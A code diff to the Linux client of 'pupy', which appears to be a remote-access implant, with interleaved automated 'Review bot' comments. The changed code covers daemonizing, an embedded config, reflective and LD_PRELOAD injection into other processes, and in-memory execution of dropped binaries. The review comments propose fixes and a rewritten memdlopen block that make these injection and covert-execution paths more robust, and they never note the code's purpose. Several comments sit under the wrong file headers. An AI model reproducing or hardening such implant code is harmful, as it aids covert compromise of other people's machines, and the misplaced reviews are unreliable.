diff --git a/client/lzma/lzmaunpack.c b/client/lzma/lzmaunpack.c
index 27af6387..770d4434 100644
--- a/client/lzma/lzmaunpack.c
+++ b/client/lzma/lzmaunpack.c
@@ -7,13 +7,12 @@ static void _lzfree(void *p, void *address) { p = p; free(address); }
 static ISzAlloc _lzallocator = { _lzalloc, _lzfree };
 static void *lzmaunpack(const char *data, size_t size, size_t *puncompressed_size) {
- char *uncompressed = NULL;
+ unsigned char *uncompressed = NULL;
 size_t uncompressed_size = 0;
- const Byte *wheader = data + sizeof(unsigned int);
- const Byte *woheader = wheader + LZMA_PROPS_SIZE;
+ const Byte *wheader = (Byte *) data + sizeof(unsigned int);
+ const Byte *woheader = (Byte *) wheader + LZMA_PROPS_SIZE;
- CLzmaDec state;
 ELzmaStatus status;
 size_t srcLen;
 int res;
diff --git a/client/sources-linux/Makefile b/client/sources-linux/Makefile
index b8377ade..e8382531 100644
--- a/client/sources-linux/Makefile
+++ b/client/sources-linux/Makefile
@@ -1,6 +1,6 @@
 CC ?= gcc
-CFLAGS := $(shell pkg-config --cflags python-2.7) -I../lzma -fPIC $(CFLAGS_EXTRA)
+CFLAGS := $(shell pkg-config --cflags python-2.7) -I../lzma -fPIC $(CFLAGS_EXTRA) -pipe -Wall
 LDFLAGS := -lpthread -ldl -fPIC $(LDFLAGS_EXTRA) -Wl,-Bstatic -lz -Wl,-Bdynamic
 PFLAGS := -OO
 PIE ?= -pie
@@ -19,7 +19,7 @@ NAME := 86
 endif
 LINUX_INJECT_CFLAGS := -include debug.h -include fixes.h \
- -Dmain=linux_inject_main "-Drealpath=realpath2"
+ -Dmain=linux_inject_main "-Drealpath=fakepath"
 ifneq ($(DEBUG),)
 DEBUG_ADD := -debug
diff --git a/client/sources-linux/daemonize.c b/client/sources-linux/daemonize.c
index 6681833f..dac4ad7e 100644
--- a/client/sources-linux/daemonize.c
+++ b/client/sources-linux/daemonize.c
@@ -1,3 +1,4 @@
+#define _GNU_SOURCE
 #include
 #include
 #include
diff --git a/client/sources-linux/decompress.c b/client/sources-linux/decompress.c
index 575a0340..8bdcd9a5 100644
--- a/client/sources-linux/decompress.c
+++ b/client/sources-linux/decompress.c
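Review bot: `wheader` and `woheader` are computed from `data` with no check in this hunk that `size` is at least `sizeof(unsigned int) + LZMA_PROPS_SIZE`, so a truncated input makes the length and properties reads run past the buffer; if the remainder of lzmaunpack (its body continues past this hunk) does not validate that, add `if (size < sizeof(unsigned int) + LZMA_PROPS_SIZE) return NULL;` ahead of these declarations. Switching `uncompressed` to `unsigned char *` matches the SDK's `Byte`, but the removed `CLzmaDec state;` declaration is not re-added anywhere visible, so any later `LzmaDec_*` call in this function now refers to some other object than it did before — worth a second look. A short comment stating the expected layout of `data` (length word, then LZMA properties, then the stream) would make the pointer arithmetic self-explaining.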
@@ -9,7 +9,6 @@ int decompress(int fd, const char *buf, size_t size) {
 int ret;
 unsigned have;
 z_stream strm;
- unsigned char in[CHUNK];
 unsigned char out[CHUNK];
 /* allocate inflate state */
@@ -29,7 +28,7 @@ int decompress(int fd, const char *buf, size_t size) {
 if (strm.avail_in == 0)
 break;
- strm.next_in = buf;
+ strm.next_in = (unsigned char *) buf;
 buf += strm.avail_in;
 size -= strm.avail_in;
diff --git a/client/sources-linux/fixes.h b/client/sources-linux/fixes.h
index 8a4199b1..c27de2be 100644
--- a/client/sources-linux/fixes.h
+++ b/client/sources-linux/fixes.h
@@ -1,7 +1,8 @@
 #ifndef ___FIXES_H
 #define ___FIXES_H
-
+#include
+#include
 #include
 #ifndef PTRACE_GETSIGINFO
@@ -9,8 +10,13 @@
 #endif
 static inline
-char *realpath2(const char *path, char *resolved_path) {
- return path;
+char *fakepath(const char *path, char *resolved_path) {
+ if (resolved_path) {
+ strncpy(resolved_path, path, PATH_MAX);
+ return resolved_path;
+ } else {
+ return strdup(path);
+ }
 }
 #endif
diff --git a/client/sources-linux/list.c b/client/sources-linux/list.c
index ecf479b8..65a77765 100644
--- a/client/sources-linux/list.c
+++ b/client/sources-linux/list.c
@@ -252,7 +252,6 @@ bool list_remove(PLIST pList, void * data)
 bool list_delete(PLIST pList, unsigned int index)
 {
 bool result = false;
- void * data = NULL;
 PNODE current_node = NULL;
 if (pList == NULL)
diff --git a/client/sources-linux/main_exe.c b/client/sources-linux/main_exe.c
index 8774b1ef..1543239c 100644
--- a/client/sources-linux/main_exe.c
+++ b/client/sources-linux/main_exe.c
@@ -1,9 +1,13 @@
 #include "pupy_load.h"
 #include "daemonize.h"
+#include
+
 int main(int argc, char *argv[], char *env[]) {
 #ifndef DEBUG
 daemonize(argc, argv, env, true);
+#else
+ mtrace();
 #endif
 return mainThread(argc, argv, false);
 }
diff --git a/client/sources-linux/pupy.c b/client/sources-linux/pupy.c
index d09ae254..c53fda86 100644
--- a/client/sources-linux/pupy.c
+++ b/client/sources-linux/pupy.c
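Review bot: The new `strm.next_in = (unsigned char *) buf;` silences the warning by casting away the `const` on `buf` instead of telling zlib the input is read-only; defining `ZLIB_CONST` before the zlib include makes `next_in` a `z_const Bytef *` on zlib 1.2.5.2 and later, after which `strm.next_in = (const Bytef *) buf;` keeps the qualifier and still compiles. That is a style point only, since inflate() does not write through `next_in`; the loop this line sits in begins and ends outside the hunk.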
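Review bot: `strncpy(resolved_path, path, PATH_MAX)` leaves `resolved_path` unterminated whenever `path` is PATH_MAX bytes or longer, and a caller of realpath() expects a NUL-terminated string in a PATH_MAX buffer, so the first use of the result reads past the buffer; use `snprintf(resolved_path, PATH_MAX, "%s", path);` or, to keep the real function's contract for overlong input, `errno = ENAMETOOLONG; return NULL;`. The `strdup(path)` branch returning NULL on allocation failure is consistent with realpath(), but nothing says why canonicalisation is deliberately skipped; a one-line comment above `fakepath` explaining that, and that the injector build substitutes it for realpath via `-Drealpath=fakepath` (see the Makefile hunk), would stop the next reader from restoring the real call. The header names on the two `#include` lines added in the previous hunk are lost on this page, so I cannot confirm which headers are meant to supply strncpy/strdup and PATH_MAX.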
@@ -13,6 +13,7 @@
 #include
 #include "tmplibrary.h"
 #include
+#include
 #include "memfd.h"
 #include "resources_library_compressed_string_txt.c"
@@ -21,7 +22,7 @@ int linux_inject_main(int argc, char **argv);
 static const char module_doc[] = "Builtins utilities for pupy";
-static const char pupy_config[32768]="####---PUPY_CONFIG_COMES_HERE---####\n";
+static const char pupy_config[32764]="####---PUPY_CONFIG_COMES_HERE---####\n";
 static PyObject *ExecError;
@@ -36,7 +37,7 @@ static PyObject *Py_get_modules(PyObject *self, PyObject *args)
 resources_library_compressed_string_txt_size
 );
- munmap(resources_library_compressed_string_txt_start,
+ munmap((char *) resources_library_compressed_string_txt_start,
 resources_library_compressed_string_txt_size);
 Py_XINCREF(modules);
@@ -50,9 +51,10 @@ Py_get_pupy_config(PyObject *self, PyObject *args)
 {
 static PyObject *config = NULL;
 if (!config) {
- size_t compressed_size = ntohl(
- *((unsigned int *) pupy_config)
- );
+ unsigned int pupy_lzma_length = 0x0;
+ memcpy(&pupy_lzma_length, pupy_config, sizeof(unsigned int));
+
+ ssize_t compressed_size = ntohl(pupy_lzma_length);
 config = PyObject_lzmaunpack(pupy_config+sizeof(int), compressed_size);
@@ -107,8 +109,7 @@ static PyObject *Py_ld_preload_inject_dll(PyObject *self, PyObject *args)
 ldobject,
 PyObject_IsTrue(py_HookExit),
 cleanup,
- lpCmdBuffer,
- ldobject
+ lpCmdBuffer
 );
 dprint("Program to execute in child context: %s\n", cmdline);
@@ -146,7 +147,6 @@ static PyObject *Py_reflective_inject_dll(PyObject *self, PyObject *args)
 uint32_t dwPid;
 const char *lpDllBuffer;
 uint32_t dwDllLenght;
- const char *cpCommandLine;
 if (!PyArg_ParseTuple(args, "Is#", &dwPid, &lpDllBuffer, &dwDllLenght))
 return NULL;
@@ -212,7 +212,6 @@ static PyObject *Py_reflective_inject_dll(PyObject *self, PyObject *args)
 static PyObject *Py_load_dll(PyObject *self, PyObject *args)
 {
- uint32_t dwPid;
 const char *lpDllBuffer;
 uint32_t dwDllLenght;
 const char *dllname;
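Review bot: `compressed_size` is taken from the first four bytes of `pupy_config` and handed straight to `PyObject_lzmaunpack` without being compared against the array, so a length word larger than `sizeof(pupy_config) - sizeof(unsigned int)` makes the unpacker read past the static buffer; add `if (compressed_size > sizeof(pupy_config) - sizeof(unsigned int)) { PyErr_SetString(ExecError, "Invalid config length"); return NULL; }` before the call. The value is patched in at build time, so this is a consistency check rather than an untrusted-input boundary, but it costs one compare. Reading the word with `memcpy` instead of dereferencing a cast pointer is the right fix for the alignment and aliasing problem; `ssize_t` for a value that ntohl() returns as uint32_t adds nothing over `size_t`, and the `pupy_config+sizeof(int)` offset should be written `sizeof(unsigned int)` to match the read. The hunk above shrinks `pupy_config` from 32768 to 32764 bytes with no explanation, and since a bounds check depends on that size, a comment beside the array stating why would help. Py_get_pupy_config's body continues past this hunk.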
@@ -236,7 +235,7 @@ static PyObject *Py_mexec(PyObject *self, PyObject *args)
 return NULL;
 Py_ssize_t argc = PySequence_Length(argv_obj);
- if (args < 1) {
+ if (argc < 1) {
 PyErr_SetString(ExecError, "Args not passed");
 return NULL;
 }
@@ -259,7 +258,7 @@ static PyObject *Py_mexec(PyObject *self, PyObject *args)
 argv[argc] = NULL;
 int stdior[3] = { -1, -1, -1 };
- pid_t pid = memexec(buffer, buffer_size, argv, stdior, redirected, detach);
+ pid_t pid = memexec(buffer, buffer_size, (const char **) argv, stdior, redirected, detach);
 if (pid < 0) {
 PyErr_SetString(ExecError, "Can't execute");
@@ -297,9 +296,9 @@ static PyMethodDef methods[] = {
 DL_EXPORT(void)
 initpupy(void)
 {
- PyObject *pupy = Py_InitModule3("pupy", methods, module_doc);
+ PyObject *pupy = Py_InitModule3("pupy", methods, (char *) module_doc);
 if (!pupy) {
- return NULL;
+ return;
 }
 ExecError = PyErr_NewException("pupy.error", NULL, NULL);
diff --git a/client/sources-linux/pupy_load.c b/client/sources-linux/pupy_load.c
index 7fc1e50f..84c43d0a 100644
--- a/client/sources-linux/pupy_load.c
+++ b/client/sources-linux/pupy_load.c
@@ -65,10 +65,6 @@ uint32_t mainThread(int argc, char *argv[], bool so) {
 int rc = 0;
 PyObject *m=NULL, *d=NULL, *seq=NULL;
- PyObject *mod;
- char * ppath;
- FILE * f;
- uintptr_t cookie = 0;
 PyGILState_STATE restore_state;
 struct rlimit lim;
@@ -89,9 +85,9 @@ uint32_t mainThread(int argc, char *argv[], bool so) {
 );
 }
- munmap(resources_libcrypto_so_start, resources_libcrypto_so_size);
- munmap(resources_libssl_so_start, resources_libssl_so_size);
- munmap(resources_python27_so_start, resources_python27_so_size);
+ munmap((char *) resources_libcrypto_so_start, resources_libcrypto_so_size);
+ munmap((char *) resources_libssl_so_start, resources_libssl_so_size);
+ munmap((char *) resources_python27_so_start, resources_python27_so_size);
 dprint("calling PyEval_InitThreads() ...\n");
 PyEval_InitThreads();
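Review bot: The corrected `if (argc < 1)` also swallows the error case, because `PySequence_Length` returns -1 with a Python exception already set when `argv_obj` is not a sequence, and this branch then replaces that exception with ExecError "Args not passed"; handle it first with `if (argc < 0) return NULL;` and keep `if (argc < 1)` for a genuinely empty list. Comparing the `args` pointer with 1 was always false, so this commit is the first time the empty-argv rejection is reachable; since `argv[argc] = NULL` in the next hunk indexes by this value, a comment such as `/* argc is now >= 1; argv must hold argc + 1 slots */` beside the argv allocation would record the invariant. Py_mexec starts before this hunk and the allocation of `argv` is not visible here.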
@@ -155,7 +151,7 @@ uint32_t mainThread(int argc, char *argv[], bool so) {
 resources_bootloader_pyc_size
 );
- munmap(resources_bootloader_pyc_start, resources_bootloader_pyc_size);
+ munmap((char *) resources_bootloader_pyc_start, resources_bootloader_pyc_size);
 if (seq) {
 Py_ssize_t i, max = PySequence_Length(seq);
@@ -179,5 +175,5 @@ uint32_t mainThread(int argc, char *argv[], bool so) {
 PyGILState_Release(restore_state);
 Py_Finalize();
 dprint("exit ...\n");
- return 0;
+ return rc;
 }
diff --git a/client/sources-linux/tmplibrary.c b/client/sources-linux/tmplibrary.c
index 0f7b23b8..88eac84e 100644
--- a/client/sources-linux/tmplibrary.c
+++ b/client/sources-linux/tmplibrary.c
@@ -168,14 +168,14 @@ set_cloexec_flag (int desc) {
 return fcntl (desc, F_SETFD, oldflags);
 }
-pid_t memexec(const char *buffer, size_t size, const char *argv[], int stdior[3], bool redirected_stdio, bool detach) {
+pid_t memexec(const char *buffer, size_t size, const char* const* argv, int stdior[3], bool redirected_stdio, bool detach) {
 dprint("memexec(%p, %ull, %d)\n", buffer, size, redirected_stdio);
 char buf[PATH_MAX]={};
 int fd = drop_library(buf, PATH_MAX, buffer, size);
 if (fd < 0) {
 dprint("Couldn't drop executable: %m\n");
- return NULL;
+ return -1;
 }
 int p_wait[2];
@@ -229,8 +229,8 @@ pid_t memexec(const char *buffer, size_t size, const char *argv[], int stdior[3]
 close(p_wait[0]);
 set_cloexec_flag(p_wait[1]);
- fexecve(fd, argv, environ);
- execv(buffer, argv);
+ fexecve(fd, (char *const *) argv, environ);
+ execv(buffer, (char *const *) argv);
 int status = errno;
 write(p_wait[1], &status, sizeof(status));
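Review bot: The `dprint("memexec(%p, %ull, %d)\n", buffer, size, redirected_stdio)` line directly under the new signature uses `%ull`, which printf parses as `%u` followed by the literal characters "ll"; `size` is a size_t, so the conversion is undefined behaviour and prints the size truncated with a stray "ll" after it — use `%zu`. With `-Wall` now added to CFLAGS in the Makefile hunk this will surface as a -Wformat warning in DEBUG builds, assuming dprint expands to a printf-family call. Returning -1 instead of NULL now matches the pid_t return type and the `pid < 0` check in Py_mexec; memexec's body continues past this hunk.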
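Review bot: The fallback `execv(buffer, (char *const *) argv)` passes `buffer` as a filename, yet the signature in the previous hunk and the `drop_library(buf, PATH_MAX, buffer, size)` call there indicate `buffer` is the in-memory image and `buf` the path it was written to, so if fexecve() fails this exec tries to run a path made of ELF bytes and fails as well; the intended line is almost certainly `execv(buf, (char *const *) argv);`. The casts are correct for the new `const char *const *` parameter, since the exec family takes `char *const[]` and does not modify the strings. Because `int status = errno;` is read after both calls, the parent only ever learns why execv failed, never why fexecve did; saving errno after fexecve and reporting that one would give the real reason.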
@@ -287,14 +287,17 @@ pid_t memexec(const char *buffer, size_t size, const char *argv[], int stdior[3]
 return child_pid;
 _lbClose3:
- if (redirected_stdio)
+ if (redirected_stdio) {
 close(p_stderr[0]); close(p_stderr[1]);
+ }
 _lbClose2:
- if (redirected_stdio)
+ if (redirected_stdio) {
 close(p_stdout[0]); close(p_stdout[1]);
+ }
 _lbClose1:
- if (redirected_stdio)
+ if (redirected_stdio) {
 close(p_stdin[0]); close(p_stdin[1]);
+ }
 _lbClose0:
 if (p_wait[0] > 0) close(p_wait[0]);
@@ -346,17 +349,12 @@ void *memdlopen(const char *soname, const char *buffer, size_t size) {
 #ifndef NO_MEMFD_DLOPEN_WORKAROUND
 if (is_memfd) {
- char *fake_path = tempnam("/dev/shm", NULL);
- if (!fake_path) {
- fake_path = tempnam("/tmp", NULL);
- }
- if (fake_path) {
- if (!symlink(buf, fake_path)) {
- strncpy(buf, fake_path, sizeof(buf)-1);
- is_memfd = false;
+ char fake_path[PATH_MAX] = {};
+ snprintf(fake_path, sizeof(fake_path), "/dev/shm/memfd:%s", soname);
+ if (!symlink(buf, fake_path)) {
+ strncpy(buf, fake_path, sizeof(buf)-1);
+ is_memfd = false;
- }
- free(fake_path);
 }
 }
 #endif
diff --git a/client/sources-linux/tmplibrary.h b/client/sources-linux/tmplibrary.h
index 107d7744..2dcd23d4 100644
--- a/client/sources-linux/tmplibrary.h
+++ b/client/sources-linux/tmplibrary.h
@@ -6,7 +6,7 @@ void *memdlopen(const char *soname, const char *buffer, size_t size);
 int drop_library(char *path, size_t path_size, const char *buffer, size_t size);
-pid_t memexec(const char *buffer, size_t size, const char *argv[], int stdior[3],
+pid_t memexec(const char *buffer, size_t size, const char *const* argv, int stdior[3],
 bool redirected_stdio, bool detach);
 #endif /* TMPLIBRARY_H */
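Review bot: The added braces correctly stop the second close() on each label from running when stdio was never redirected, but the guard on the last context line, `if (p_wait[0] > 0)`, treats descriptor 0 as "not open"; main_exe.c calls daemonize() before mainThread, and if that closes stdin rather than redirecting it, pipe() can legitimately hand back 0 and this path then leaks it. `p_wait` is also declared without an initialiser in the earlier hunk (`int p_wait[2];`), so if any goto to `_lbClose0` can precede the pipe() call the test reads an indeterminate value; `int p_wait[2] = { -1, -1 };` at the declaration and `if (p_wait[0] >= 0)` here close both gaps, and the same pattern likely applies to the stdio pipes handled outside this hunk. memexec starts before this hunk.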
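Review bot: The replacement link name `/dev/shm/memfd:<soname>` is predictable, is created in a world-writable directory from a caller-supplied `soname` that is not checked for `/` or `..`, and neither the snprintf() return value nor the reason symlink() fails is examined, so any other local user, a second instance of this process, or a stale link from an earlier run can own that name already, symlink() returns EEXIST, and the code silently falls back to the raw memfd path. The tempnam() version it replaces produced a fresh name per call; the fixed name also means a link pointing at a dead `/proc/<pid>/fd/N` target is left behind, with no cleanup visible in this hunk. A private directory from mkdtemp() (mode 0700, so no other user can plant a link inside it), a rejection of sonames containing a slash, and a truncation check cover all three; the directory and link still need removing after dlopen() returns, which this hunk does not show. memdlopen starts before this hunk.
```c
    if (is_memfd) {
        char fake_dir[PATH_MAX] = "/dev/shm/.memfd-XXXXXX";
        char fake_path[PATH_MAX] = {};
        int n;

        /* refuse a soname that could escape the private directory */
        if (strchr(soname, '/') == NULL && mkdtemp(fake_dir) != NULL) {
            n = snprintf(fake_path, sizeof(fake_path), "%s/%s", fake_dir, soname);
            if (n > 0 && (size_t) n < sizeof(fake_path) && !symlink(buf, fake_path)) {
                strncpy(buf, fake_path, sizeof(buf)-1);
                is_memfd = false;
            } else {
                rmdir(fake_dir);
            }
        }
        /* … unchanged: dlopen of buf and cleanup are outside this hunk … */
    }
```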